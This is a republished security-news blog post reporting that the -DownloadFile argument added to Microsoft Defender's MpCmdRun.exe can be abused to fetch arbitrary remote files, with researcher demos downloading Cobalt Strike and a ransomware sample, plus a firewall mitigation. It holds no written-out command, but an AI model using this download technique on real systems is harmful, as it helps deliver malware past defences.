fbpx
perm_phone_msgConsider your business risks? Chat With US

Microsoft’s Windows Defender MpCmdRun.exe can be manipulated to download malware

Ransomware BCyber todaySeptember 21, 2020 77

Background
share close

The recently updated MpCmdRun.exe tool in Windows 10 antivirus can easily be exploited to make Windows Defender download a malware

Microsoft Defender aka Windows Defender has proven to be a hardy anti-virus tool for defending Windows 10 PC/laptops/servers from malware, trojan, and other malicious scripts. After years of neglect, Microsoft put some labor into Windows Defender, retooled it, and renamed it as Microsoft Defender.  The retooled and renamed Microsoft Defender is now perhaps one of the top anti-malware apps for Windows 10. However, it is not without fault.

It so happens that a recently updated tool in Microsoft Defender can be easily manipulated to make the Microsoft Defender download malware. Security researcher Mohammad Askar has discovered that the recently updated MpCmdRun.exe command has a backdoor that could be easily manipulated to make the victim’s PC/laptop or server download malicious files from a remote location.

Well, you can download a file from the internet using Windows Defender itself.

In this example, I was able to download Cobalt Strike beacon using the binary “MpCmdRun.exe” which is the “Microsoft Malware Protection Command Line”. pic.twitter.com/RdCira3QPt

— Askar (@mohammadaskar2) September 2, 2020

Microsoft has recently released the updated version of the Microsoft Antimalware Service Command Line Utility, also known as MpCmdRun.exe. This is a process that is associated with Microsoft Defender’s anti-spyware and it protects the system against Internet threats such as spyware, adware, and trojans. The new update in MpCmdRun.exe has a new -DownloadFile command-line argument. Askar found that he could use this command-line to make the Windows 10 device download any remotely-stored file.

The new download file feature in MpCmdRun.exe was added to Microsoft Defender in version 4.18.2007.9 or 4.18.2009.9 and is vulnerable to this exploit. Bleeping Computer used Askar’s PoC to download the resources.exe file, the WastedLocker Ransomware sample used in a recent Garmin attack.

However, Microsoft Defender thankfully scans files downloaded even by itself so it was able to flag the malicious download. However, it is not known whether other anti-virus software would flag such downloads. The easiest way to prevent any exploit is to just block MpCmdRun.exe from connecting to remote locations, and IT admins can just set up a firewall rule to limit Internet access.

The post Microsoft’s Windows Defender MpCmdRun.exe can be manipulated to download malware appeared first on AndroidRookies.

This content was originally published here.

Written by: BCyber

Rate it
Previous post

Similar posts

Ransomware BCyber / October 19, 2020

Ad-light, Malware-heavy # Chris Dzombak

Ad-light, Malware-heavy Since December 17, Forbes has been running an experiment wherein some fraction of visitors who are running ad blockers are blocked from accessing Forbes articles until they disable their ad blocker. In exchange, Forbes promises an “ad-light experience”: A Forbes article published yesterday claims that this interstitial resulted in 42.4% of visitors turning ...

Read more trending_flat